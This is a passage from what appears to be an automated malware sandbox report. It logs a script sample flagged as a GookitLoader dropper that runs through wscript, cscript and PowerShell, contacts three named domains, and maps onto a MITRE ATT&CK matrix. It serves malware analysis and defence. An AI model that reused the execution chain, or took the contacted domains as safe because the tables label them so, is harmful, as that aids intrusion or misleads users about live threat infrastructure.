          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information2
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		2
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping2
          Security Software Discovery          		Remote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Scheduled Task/Job          		1
          Scheduled Task/Job          		1
          Scheduled Task/Job          		121
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Exploitation for Client Execution          		1
          Office Application Startup          		1
          DLL Side-Loading          		11
          Process Injection          		Security Account Manager121
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCron1
          DLL Side-Loading          		Login Hook1
          Obfuscated Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture14
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500124 Sample: is it legal to kill a peaco... Startdate: 27/08/2024 Architecture: WINDOWS Score: 72 29 www.shamara.de 2->29 31 ipacrack.com 2->31 33 ellinikiaktoploia.net 2->33 41 Yara detected GookitLoader 2->41 43 Sigma detected: WScript or CScript Dropper 2->43 8 wscript.exe 1 1 2->8         started        11 wscript.exe 1 2->11         started        13 wscript.exe 2->13         started        signatures3 process4 signatures5 49 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->49 15 cscript.exe 1 1 8->15         started        51 Suspicious execution chain found 11->51 53 Potential evasive JS / VBS script found (domain check) 11->53 17 cscript.exe 1 13->17         started        process6 process7 19 powershell.exe 14 48 15->19         started        23 conhost.exe 15->23         started        25 powershell.exe 40 17->25         started        27 conhost.exe 17->27         started        dnsIp8 35 www.shamara.de 109.237.132.6, 443, 49713, 49715 CLOUDPITDE Germany 19->35 37 ipacrack.com 188.114.96.3, 443, 49716, 49718 CLOUDFLARENETUS European Union 19->37 45 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 19->45 47 Loading BitLocker PowerShell Module 19->47 39 ellinikiaktoploia.net 104.21.67.130, 443, 49717 CLOUDFLARENETUS United States 25->39 signatures9

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js0%Avira URL Cloudsafe
          https://github.com/apache/echarts/issues/142660%Avira URL Cloudsafe
          https://www.shamara.de/0%Avira URL Cloudsafe
          https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight0%Avira URL Cloudsafe
          https://ipacrack.com/0%Avira URL Cloudsafe
          https://github.com/apache/incubator-echarts/issues/113690%Avira URL Cloudsafe
          http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
          https://github.com/apache/incubator-echarts/issues/122290%Avira URL Cloudsafe
          https://ellinikiaktoploia.net/0%Avira URL Cloudsafe
          https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation0%Avira URL Cloudsafe
          https://github.com/ecomfe/zrender/blob/master/LICENSE.txt0%Avira URL Cloudsafe
          https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js0%Avira URL Cloudsafe
          https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf0%Avira URL Cloudsafe
          https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js0%Avira URL Cloudsafe
          https://jsperf.com/try-catch-performance-overhead0%Avira URL Cloudsafe
          http://0.30000000000000004.com/0%Avira URL Cloudsafe
          https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).0%Avira URL Cloudsafe
          https://jsbench.me/2vkpcekkvw/1)0%Avira URL Cloudsafe
          https://momentjs.com/0%Avira URL Cloudsafe
          https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)0%Avira URL Cloudsafe
          https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js0%Avira URL Cloudsafe
          https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ipacrack.com
          		188.114.96.3
          		truefalse
            		unknown
            ellinikiaktoploia.net
            		104.21.67.130
            		truefalse
              		unknown
              www.shamara.de
              		109.237.132.6
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://www.shamara.de/false
                • Avira URL Cloud: safe
                		unknown
                https://ipacrack.com/false
                • Avira URL Cloud: safe
                		unknown
                https://ellinikiaktoploia.net/false
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://github.com/apache/incubator-echarts/issues/11369wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/apache/incubator-echarts/issues/12229wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.jswscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flightwscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperationwscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/apache/echarts/issues/14266wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.jswscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://jsperf.com/try-catch-performance-overheadwscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdfwscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://jsbench.me/2vkpcekkvw/1)wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://0.30000000000000004.com/wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/ecomfe/zrender/blob/master/LICENSE.txtwscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
